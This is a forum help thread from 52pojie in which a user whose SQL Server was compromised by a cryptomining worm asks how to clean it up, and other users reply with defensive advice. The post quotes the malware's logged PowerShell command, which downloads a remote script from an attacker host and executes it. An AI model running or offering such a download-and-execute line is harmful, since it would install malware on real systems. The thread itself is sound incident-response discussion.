吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2594|回复: 3
收起左侧

【求助】挖矿病毒爆破SQLServer服务,利用powershell进行无文件攻击,求清理方法

[复制链接]
AntChenxi 发表于 2020-9-23 23:30
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
服务器中了挖矿病毒,通过弱口令爆破SQLServer服务,注入powerShell进行无文件攻击


命令行: cmd.exe /c powershell iex(new-object net.webclient).downloadstring('http://d.ackng.com/if.bin?once')

进程路径: C:/Windows/System32/cmd.exe

进程ID: 11320

父进程命令行: C:/Program Files/Microsoft SQL Server/MSSQL12.MSSQLSERVER/MSSQL/Binn/sqlservr.exe

父进程文件路径: C:/Program Files/Microsoft SQL Server/MSSQL12.MSSQLSERVER/MSSQL/Binn/sqlservr.exe


查阅网上信息后只能知道以上信息,SQLServer与windowns定时任务都查过了,没有发现异常任务。SQLServer密码已经修改,但该病毒仍然会自启。


求助如何清理该病毒?

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

w2010d 发表于 2020-9-24 14:11
用hunter或者火绒剑看一下有没有注入到正常进程的,还有查一下外部链接啥的,排查防火墙开没开什么出入站策略啥的
szswtw 发表于 2020-9-25 08:11
本帖最后由 szswtw 于 2020-9-25 08:12 编辑

请参照我的一个旧帖,看看有没有雷同。
https://www.52pojie.cn/thread-671337-1-1.html



另外此类病毒是可以通过局域网传播和攻击的,也需要全局域网内检查。封闭该封闭的端口和服务。
cutthesoul 发表于 2020-9-25 16:38
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 17:10

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表